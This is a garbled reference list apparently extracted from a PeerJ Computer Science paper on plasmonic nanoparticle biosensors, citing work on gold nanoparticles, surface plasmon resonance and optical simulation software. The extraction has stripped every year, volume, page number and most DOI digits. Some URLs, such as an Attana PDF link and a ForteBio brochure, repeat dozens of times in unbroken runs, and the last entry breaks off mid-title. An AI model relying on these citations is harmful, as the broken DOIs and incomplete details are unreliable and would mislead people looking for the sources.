http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://www.attana.com/wp-content/uploads/ / /tn - -immobilization-of-antibodies-on-the-attana-carboxyl-sensor-chip-surface.pdf http://dx.doi.org/ . /ncomms http://dx.doi.org/ . /pssc. http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://cython.org http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - / http://dx.doi.org/ . /peerj-cs. brown lo, doorn sk. . optimization of the preparation of glass-coated, dye-tagged metal nanoparticles as sers substrates. langmuir: the acs journal of surfaces and colloids ( ): – doi . /la f. bruggeman d. . calculation of different physical constants of heterogeneous substances i: dielectric constant and conductivity of media of isotropic substances. annales de physique : – doi . /andp. . byrnes s. . tmm. available at https://pypi.python.org/pypi/tmm. chang t-c, wu c-c, wang s-c, chau l-k, hsieh w-h. . using a fiber optic particle plasmon resonance biosensor to determine kinetic constants of antigen-antibody binding reaction. analytical chemistry ( ): – doi . /ac n. chen k, obinata h, izumi t. . detection of g protein-coupled receptor-mediated cellular response involved in cytoskeletal rearrangement using surface plasmon resonance. biosensors & bioelectronics ( ): – doi . /j.bios. . . . cheng y, wang m, borghs g, chen h. . gold nanoparticle dimers for plasmon sensing. langmuir : – doi . /la m. cooper cd, bardhan jp, barba la. . a biomolecular electrostatics solver using python, gpus and boundary elements that can handle solvent-filled cavities and stern layers. computer physics communications ( ): – doi . /j.cpc. . . . elias m, elias g. . new and fast calculation for incoherent multiple scattering. journal of the optical society of america a ( ): – doi . /josaa. . . enthought. . enthought tool suite. version . . . available at http://code.enthought.com/ projects/. fortebio. . octet platform. technical report. available at http://www.mscience.com.au/upload/ pages/fortebio/octet platform brochure low-rez.pdf? . francis em. . empy: electromagnetic python. available at http://lbolla.github.io/empy/. freeman rg, grabar kc, allison kj, bright rm, davis ja, guthrie ap, hommer mb, jackson ma, smith pc, walter dg, natan mj. . self-assembled metal colloid monolayers: an approach to sers substrates. science ( ): – doi . /science. . . . fujiwara k, kasaya h, ogawa n. . gold nanoparticle monolayer formation on a chemically modified glass surface. analytical sciences : the international journal of the japan society for analytical chemistry ( ): – doi . /analsci. . . gao l, lemarchand f, lequime m. . comparison of different dispersion models for single layer optical thin film index determination. thin solid films ( ): – doi . /j.tsf. . . . garcıa ma, llopis j, paje se. . a simple model for evaluating the optical absorption spectrum from small au-colloids in sol—gel films. chemical physics letters : – doi . /s - ( ) - . garnett j. . colours in metal glasses and in metallic films. philosophical transactions of the royal society : – doi . /rsta. . . glycerine producers’ association. . physical properties of glycerine and its solutions. new york: glycerine producers’ association. gupta bd, verma rk. . surface plasmon resonance-based fiber optic sensors: principle, probe designs, and some applications. journal of sensors : doi . / / . hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /la f http://dx.doi.org/ . /andp. https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm https://pypi.python.org/pypi/tmm http://dx.doi.org/ . /ac n http://dx.doi.org/ . /j.bios. . . http://dx.doi.org/ . /la m http://dx.doi.org/ . /j.cpc. . . http://dx.doi.org/ . /josaa. . http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://code.enthought.com/projects/ http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://www.mscience.com.au/upload/pages/fortebio/octet_platform_brochure_low-rez.pdf? http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://lbolla.github.io/empy/ http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /analsci. . http://dx.doi.org/ . /j.tsf. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /rsta. . http://dx.doi.org/ . / / http://dx.doi.org/ . /peerj-cs. habashy tm, abubakar a. . formulation for modeling of the electromagnetic fields. journal of electromagnetic waves and applications ( ): – . haes a, change l, klein w, van duyne r. . detection of a biomarker for alzheimer’s disease from synthetic and clinical samples using a nanoscale optical biosensor. jacs : – doi . /ja q. hagemann h-j, gudat w, kunz c. . optical constants from the far infrared to the x-ray region: mg, al, cu, ag, au, bi, c, and al o . journal of the optical society of america ( ): – doi . /josa. . . hohenester u, trugler a. . mnpbem: a matlab toolbox. computer physics communications : – doi . /j.cpc. . . . hughes a, liu z. . scikit-spectra: tools for explorative spectroscopy. available at http:// hugadams.github.io/scikit-spectra/. hughes a, liu z, raftari m, reeves me. . a workflow for characterizing nanoparticle monolayers for biosensors: machine learning on real and artificial sem images. peerj preprints :e v doi . /peerj.preprints. v . hutter e, fendler jh. . size quantized formation and self-assembly of gold encased silver nanoparticles. chem communication : – doi . /b b. issa na, guckenberger r. . optical nanofocusing on tapered metallic waveguides. plasmonics ( ): – doi . /s - - - . jain pk, lee ks, el-sayed ih, el-sayed ma. . calculated absorption and scattering properties of gold nanoparticles of different size, shape, and composition: applications in biological imaging and biomedicine. the journal of physical chemistry b ( ): – doi . /jp o. jans h, liu x, austin l, maes g, huo q. . dynamic light scattering as a powerful tool for gold nanoparticle bioconjugation and biomolecular binding studies. analytical chemistry ( ): – doi . /ac w. jeong h-h, erdene n, park j-h, jeong d-h, lee s-k. . analysis of fiber-optic localized surface plasmon resonance sensor by controlling formation of gold nanoparticles and its bio-application. journal of nanoscience and nanotechnology : – doi . /jnn. . . jeong hyeon-ho, lee s-k. . the method of measurement signal processing of biosensor based on optical fiber using reflected localized surface plasmon resonance. journal of sensor science and technology ( ): – doi . /jsst. . . . . johnson p, christy r. . optical constants of noble metals. physical review b ( ): – doi . /physrevb. . . jong whd. . drug delivery and nanoparticles: applications and hazards. international journal of nanomedicine ( ): – doi . /ijn.s . kessentini s, barchiesi d. . quantitative comparison of optimized nanorods, nanoshells and hollow nanospheres for photothermal therapy. biomedical optics express ( ): – doi . /boe. . . klebstov ng. . optical models for conjugates of gold and silver nanoparticles with biomacromolecules. journal of quantitative spectroscopy & radiative transfer : – doi . /j.jqsrt. . . . kraziński be, radecki j, radecka h. . surface plasmon resonance based biosensors for exploring the influence of alkaloids on aggregation of amyloid-β peptide. sensors ( ): – doi . /s . hughes et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /ja q http://dx.doi.org/ . /josa. . http://dx.doi.org/ . /j.cpc. . . http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://hugadams.github.io/scikit-spectra/ http://dx.doi.org/ . /peerj.preprints. v http://dx.doi.org/ . /b b http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jp o http://dx.doi.org/ . /ac w http://dx.doi.org/ . /jnn. . http://dx.doi.org/ . /jsst. . . . http://dx.doi.org/ . /physrevb. . http://dx.doi.org/ . /ijn.s http://dx.doi.org/ . /boe. . http://dx.doi.org/ . /j.jqsrt. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /peerj-cs. lans pc. . spectral density analysis of thin gold films: thickness and structure dependence of the optical properties. in: progress in electromagnetics research symposium proceedings, vol. , stockholm, – . lecaruyer p, maillart e, canva m, rolland j. . generalization of the rouard method to an absorbing thin-film stack and application to surface plasmon resonance. applied optics ( ): – doi . /ao. . . lee k-s, el-sayed ma. . gold and silver nanoparticles in sensing and imaging: sensitivity of plasmon response to size, shape, and metal composition. the journal of physical chemistry b ( ): – doi . /jp y. lee j-y, lee c-w, lin e-h, wei p-k. . single live cell refractometer using nanoparticle coated fiber tip. applied physics letters ( ): doi . / . . li x, tamada k, baba a, knoll w, hara m. . estimation of dielectric function of biotin-capped gold nanoparticles via signal enhancement on surface plasmon resonance. the journal of physical chemistry. b ( ): – doi . /jp h. library g, office il, states u, code us. . theoretical investigations for surface plasmon resonance based optical fiber tip sensor. sensors and actuators b: chemical ( ): – . lin h-y, huang c-h, liu y-c, huang k-w, chau l-k. . multiplex fiber-optic biosensor using multiple particle plasmon resonances. in: canning j, peng g, eds. third asia pacific optical sensors conference. s– s– . lin h, liu cp, wang c. . a simple and universal 